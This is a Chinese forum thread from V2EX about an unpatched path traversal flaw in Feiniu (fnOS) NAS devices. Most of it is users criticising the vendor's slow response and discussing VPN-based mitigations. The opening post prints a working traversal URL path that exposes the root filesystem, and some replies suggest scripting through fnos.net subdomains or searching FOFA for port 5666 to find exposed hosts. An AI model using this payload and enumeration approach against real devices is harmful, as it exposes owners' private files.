V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
Tink
V2EX  ›  信息安全

飞牛这个漏洞 POC 太容易了啊

  •  
  •   Tink ·
    PRO
    · 17 小时 16 分钟前 · 2882 次点击
    打开 FN Connect 随便输入一个 id ,只要撞上了能打开登录页,加上

    /app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../

    直接就到 /了啊

    太离谱了
    26 条回复    2026-02-01 15:37:38 +08:00
    stinkytofux
        1
    stinkytofux  
       16 小时 59 分钟前   ❤️ 3
    0day 就是这么可怕, 更可怕的是捂盖子, 导致更多人受害.
    Tink
        2
    Tink  
    OP
    PRO
       16 小时 52 分钟前
    @stinkytofux 官方为什么不强推新版本呢,强制修复漏洞
    Joming
        3
    Joming  
       16 小时 49 分钟前
    TMD 到现在都没发公告!好在公司发现比较早,不然严重泄露信息!再不会用了!
    wfhtqp
        4
    wfhtqp  
       16 小时 49 分钟前
    问题是飞牛不当回事,fnid 现在还不暂停,原来没有公网的也全暴漏了
    wfhtqp
        5
    wfhtqp  
       16 小时 48 分钟前   ❤️ 3
    https://club.fnnas.com/forum.php?mod=viewthread&tid=48354 25 年 12 月。。。还有更早的。。。
    YJBZC
        6
    YJBZC  
       16 小时 33 分钟前
    @wfhtqp 我草,飞牛官方团队在一个多月前就知道这个漏洞了,到今天都没发个公告或者强制更新修复
    wfhtqp
        7
    wfhtqp  
       16 小时 12 分钟前
    @YJBZC 这才哪到哪? fn connect 还开着呢
    labubu
        8
    labubu  
       16 小时 3 分钟前 via Android
    不是绑定手机了吗,打电话发短信给用户呗?
    bitkuang
        9
    bitkuang  
       15 小时 49 分钟前 via Android
    没复现出来,还有别的条件吧
    haoshuaiwang
        10
    haoshuaiwang  
       15 小时 46 分钟前
    写个脚本跑就行了

    {fnid}.fnos.net
    baton
        11
    baton  
       15 小时 40 分钟前 via Android   ❤️ 1
    经历过宝塔后就不敢用国内这些面板,安全性是个大问题
    a9htdkbv
        12
    a9htdkbv  
       15 小时 35 分钟前 via Android
    还好我有先见之明,昨天早上关闭 fn connect ,晚上就把整个飞牛虚拟机扬了
    emoker
        13
    emoker  
       15 小时 3 分钟前
    @baton 请教宝塔具体是啥问题?之前没关注过
    AkinoKaedeChan
        14
    AkinoKaedeChan  
       14 小时 54 分钟前 via Android
    flyqie
        15
    flyqie  
       14 小时 47 分钟前 via Android   ❤️ 1
    是的,之前以为飞牛官方会做紧急的限制,现在看来似乎没有任何限制,不知道是限于架构问题做不了还是不想做。
    yinanc
        16
    yinanc  
       14 小时 31 分钟前   ❤️ 1
    @flyqie 估计就国内处理问题的一贯思路,装死等这波舆论过去了,就可以当没有发生了
    emoker
        17
    emoker  
       14 小时 31 分钟前
    @AkinoKaedeChan 感谢大佬
    stinkytofux
        18
    stinkytofux  
       14 小时 21 分钟前
    ryd994
        19
    ryd994  
       12 小时 15 分钟前 via Android
    我相信有很多人就是图个 fnconnect 的方便。这下好了,不能开公网,不能用 fnconnect ,结果还是要自己配置 VPN/zerotier 。

    我的 nas 只能通过 VPN 或者 cloudflare tunnel 访问,后者经过 zero trust 的鉴权。所有不登入就能访问的服务(比如 BT )都跑在容器里。
    hanguofu
        20
    hanguofu  
       5 小时 53 分钟前
    @ryd994 : 请问你是自己买了一个域名并用 cf 代理吗 ?
    sardina
        21
    sardina  
       5 小时 14 分钟前
    2025-12-25 18:06:25 只看该作者回复
    感谢反馈我转给负责的同事看看
    一个月前就说反馈 结果还没修复。。。
    Curtion
        22
    Curtion  
       5 小时 2 分钟前
    还真是, 直接在 fofa 搜索 5666 端口,随便找一个进去就能访问到文件了。。 我觉得飞牛应该强制关闭 fn connet ,直到用户升级系统。
    MiKing233
        23
    MiKing233  
       4 小时 53 分钟前
    @flyqie 说做不了是不可能的, 哪怕临时停止解析 5ddd.com 这种 FN Connect 域名也可以尽可能减少漏洞利用范围, 我真没看明白他们除了在论坛发帖忽悠小白之外究竟还采取了哪些主动的安全挽救措施
    MiKing233
        24
    MiKing233  
       4 小时 51 分钟前
    @flyqie 以及漏洞被大规模利用已经过去超过了一天一夜, 我不知道他们公司的老板和法人是怎么睡得着觉的
    panda188
        25
    panda188  
       3 小时 2 分钟前 via Android
    不会降本增效,已经把负责这个,会这个的裁了吧?
    hatch
        26
    hatch  
       49 分钟前
    作死💊,估计内部也一团糟,问题流转半天找不到能挑担的人
    关于   ·   帮助文档   ·   自助推广系统   ·   博客   ·   API   ·   FAQ   ·   Solana   ·   2150 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 23ms · UTC 08:27 · PVG 16:27 · LAX 00:27 · JFK 03:27
    ♥ Do have faith in what you're doing.